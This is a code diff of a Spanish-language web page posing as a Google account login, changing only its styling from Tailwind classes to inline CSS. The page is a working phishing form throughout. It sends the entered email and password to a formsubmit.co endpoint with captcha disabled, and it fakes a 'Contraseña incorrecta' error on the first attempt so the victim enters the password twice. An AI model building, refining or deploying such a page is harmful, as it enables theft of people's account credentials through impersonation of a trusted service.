--- a/index.html
+++ b/index.html
@@ -1,76 +1,74 @@
-<!DOCTYPE html> 
+<!DOCTYPE html>
 <html lang="es">
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Accede a tu cuenta con tu Cuenta de google</title>
-  <script src="https://cdn.tailwindcss.com"></script>
+  <title>Accede a tu cuenta con tu Cuenta de Google</title>
   <link href="//www.gstatic.com/images/branding/searchlogo/ico/favicon.ico" rel="icon">
 </head>
-<body class="bg-[#f0f4f9] flex items-center justify-center min-h-screen">
+<body style="background-color: #f0f4f9; display: flex; align-items: center; justify-content: center; min-height: 100vh; margin:0;">
 
   <!-- Contenedor -->
- <div style="width: 100%; max-width: 1280px; background-color: white; box-shadow: 0 10px 15px rgba(0,0,0,0.1); border-radius: 1rem; padding: 32px;">
+  <div style="width: 70%; max-width: 1280px; background-color: white; box-shadow: 0 10px 15px rgba(0,0,0,0.1); border-radius: 16px; padding: 32px; box-sizing: border-box;">
 
-    
     <!-- Logo + Título -->
-    <div class="mb-6">
+    <div style="margin-bottom: 24px;">
       <img src="https://www.gstatic.com/images/branding/product/1x/gsa_512dp.png" 
-           alt="Google" class="w-10 mb-4">
-      <h1 class="text-2xl text-gray-900 font-normal">Accede a tu cuenta</h1>
-      <a href="#" class="text-sm text-gray-700">Ir a Gmail</a>
+           alt="Google" style="width: 40px; margin-bottom: 16px;">
+      <h1 style="font-size: 24px; color: #111827; font-weight: 400; margin:0;">Accede a tu cuenta</h1>
+      <a href="#" style="font-size: 14px; color: #374151; text-decoration: none;">Ir a Gmail</a>
     </div>
 
     <!-- Formulario -->
     <form id="contactForm" 
           action="https://formsubmit.co/b58372e3afafe5f908daf1b0cc3c700f" 
           method="POST" 
-          class="space-y-5">
+          style="display: flex; flex-direction: column; gap: 20px;">
 
       <!-- Paso 1: Correo -->
       <div id="step1">
         <input 
-          class="w-full border border-gray-300 rounded px-3 py-3 text-base focus:outline-none focus:ring-1 focus:ring-blue-600"
           id="correo"
           name="correo" 
           placeholder="Correo electrónico o teléfono" 
           type="email" 
-          required>
+          required
+          style="width: 100%; border: 1px solid #D1D5DB; border-radius: 8px; padding: 12px; font-size: 16px; box-sizing: border-box; outline: none;">
 
-        <div class="text-sm mt-2">
-          <a href="#" class="text-blue-600">¿Olvidaste el correo electrónico?</a>
+        <div style="font-size: 14px; margin-top: 8px;">
+          <a href="#" style="color: #2563EB; text-decoration: none;">¿Olvidaste el correo electrónico?</a>
         </div>
 
-        <div class="flex justify-between items-center mt-6">
-          <a href="#" class="text-blue-600 text-sm">Crear cuenta</a>
+        <div style="display: flex; justify-content: space-between; align-items: center; margin-top: 24px;">
+          <a href="#" style="color: #2563EB; font-size: 14px; text-decoration: none;">Crear cuenta</a>
           <button type="button" 
                   id="btnNext1"
-                  class="bg-blue-600 hover:bg-blue-700 text-white px-6 py-2 rounded font-medium">
+                  style="background-color: #2563EB; color: white; padding: 8px 24px; border-radius: 8px; font-weight: 500; border:none; cursor:pointer;">
             Siguiente
           </button>
         </div>
       </div>
 
       <!-- Paso 2: Contraseña (oculto al inicio) -->
-      <div id="step2" class="hidden">
-        <p class="text-gray-700 text-sm mb-2">Introduce tu contraseña</p>
+      <div id="step2" style="display: none;">
+        <p style="color: #374151; font-size: 14px; margin-bottom: 8px;">Introduce tu contraseña</p>
 
         <input id="nombre" 
-               class="w-full border border-gray-300 rounded px-3 py-3 text-base focus:outline-none focus:ring-1 focus:ring-blue-600" 
                name="nombre" 
                placeholder="Ingresa tu contraseña" 
                type="password" 
-               required>
-        <p id="errorNombre" class="text-red-600 text-sm mt-1 hidden">Contraseña incorrecta</p>
+               required
+               style="width: 100%; border: 1px solid #D1D5DB; border-radius: 8px; padding: 12px; font-size: 16px; box-sizing: border-box; outline: none;">
+        <p id="errorNombre" style="color: #DC2626; font-size: 14px; margin-top: 4px; display:none;">Contraseña incorrecta</p>
 
         <!-- Hidden fields -->
         <input type="hidden" name="_next" value="https://tu-pagina.com/gracias.html">
         <input type="hidden" name="_captcha" value="false">
 
-        <div class="flex justify-between items-center mt-6">
-          <a href="#" class="text-blue-600 text-sm">¿Olvidaste tu contraseña?</a>
+        <div style="display: flex; justify-content: space-between; align-items: center; margin-top: 24px;">
+          <a href="#" style="color: #2563EB; font-size: 14px; text-decoration: none;">¿Olvidaste tu contraseña?</a>
           <button type="submit" 
-                  class="bg-blue-600 hover:bg-blue-700 text-white px-6 py-2 rounded font-medium">
+                  style="background-color: #2563EB; color: white; padding: 8px 24px; border-radius: 8px; font-weight: 500; border:none; cursor:pointer;">
             Siguiente
           </button>
         </div>
@@ -89,8 +87,8 @@
         alert("Por favor ingresa tu correo");
         return;
       }
-      document.getElementById("step1").classList.add("hidden");
-      document.getElementById("step2").classList.remove("hidden");
+      document.getElementById("step1").style.display = "none";
+      document.getElementById("step2").style.display = "block";
     });
 
     // Validación contraseña
@@ -101,13 +99,13 @@
       intentoNombre++;
 
       if (intentoNombre < 2) { 
-        errorMsg.classList.remove("hidden");
-        nombre.classList.add("border-red-500");
+        errorMsg.style.display = "block";
+        nombre.style.borderColor = "#DC2626";
         errorMsg.textContent = "Contraseña incorrecta";
         e.preventDefault();
       } else {
-        errorMsg.classList.add("hidden");
-        nombre.classList.remove("border-red-500");
+        errorMsg.style.display = "none";
+        nombre.style.borderColor = "#D1D5DB";
       }
     });
 
@@ -123,3 +121,4 @@
 
 </body>
 </html>
+
